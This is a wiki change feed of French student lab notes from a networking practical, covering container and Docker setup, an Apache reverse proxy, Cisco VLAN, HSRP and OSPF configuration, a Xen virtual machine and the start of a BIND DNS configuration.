==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49085</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49085"/>
				<updated>2018-12-21T14:49:13Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
